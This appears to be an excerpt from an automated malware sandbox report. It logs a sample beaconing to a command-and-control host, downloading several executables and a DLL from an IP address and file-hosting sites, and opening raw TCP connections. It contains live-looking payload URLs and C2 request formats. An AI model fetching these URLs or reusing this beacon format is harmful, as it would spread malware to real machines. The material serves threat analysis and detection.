Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /freedom.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freedom.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freedom.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Jhiidutz.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 185.216.214.225Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe

Code function: 4_2_001D5880 InternetOpenW,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

4_2_001D5880

Source: global traffic	HTTP traffic detected: GET /52i.exe HTTP/1.1Host: 2x.si
Source: global traffic	HTTP traffic detected: GET /dl/12050075/loli.exe HTTP/1.1Host: tmpfiles.org
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dl/12050266/googleupdats.exe HTTP/1.1Host: tmpfiles.orgCookie: XSRF-TOKEN=eyJpdiI6Ik5rOTRXbXJKQ3UxZm9tTk5GRnpGZmc9PSIsInZhbHVlIjoiUFI3Z0pORkEweFJqOXllNStmVlJOWWhBOUtHYkdBb3lXSFRncjNwdnB2NlZ3K3JTbVQ0TnJ4Z1RRK1lTcTBsUWlsQ3pnUUFFUnk1eE5ZM0t3ZnpHTE9FRDFzOVI0SUxYVzZoL1RHbE5peEQxSG1SQ0xvemZlUktzOEdqd2ViRmciLCJtYWMiOiI1ZjQzY2FhMWVjOWYyNGE3ZThlYjY4YjgxZmY0NjY5MTczY2U1MjQ0NDRhZWJjZjBmNzQ3N2JjZGJlNTkzZWJmIn0%3D; tmpfiles_session=eyJpdiI6IjgwM1pHV1MvT2N3Z2lLVFZZVWQ1NFE9PSIsInZhbHVlIjoiUE95bElQcGM0QmdYcUlGT3hGSGp0dThiL1AxWVc4SC82aFFnSnRieG0rTWpwN2VoZDA1bi9IMmJWT2pVZ2tiZ0kvcG9KWFk1Z2trUnR6NFdtd0ZpSE12RGZYZjdqQUNuMVNES09IMTUyOTZOcVZGNU56RklXbXRLZWFQN2tLZjgiLCJtYWMiOiI5ZWIyNzVmZTJjNjg3ODU1YzZjYTA3NjZiMDA2YjY3OWM1ZWQ1MDk1MTJlN2RlZTRkZTU0NDdhOTg2ZTU0OTg3In0%3D
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9ADE HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9ADF HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD1 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD1 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD0 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
Source: global traffic	HTTP traffic detected: GET /vGW.exe HTTP/1.1Host: 2x.siConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /DamnCrypt/Zd8fux7fzhe2u7w/releases/download/Test/plugin3.dll HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD0 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/782711733/d424d098-b503-4902-b23f-cacb231ad890?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240831%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240831T204234Z&X-Amz-Expires=300&X-Amz-Signature=97c525f89adf13ec2bd6fb64e7fa3496235cc389517f40e7b5c36b7bd790d0c0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=782711733&response-content-disposition=attachment%3B%20filename%3Dplugin3.dll&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
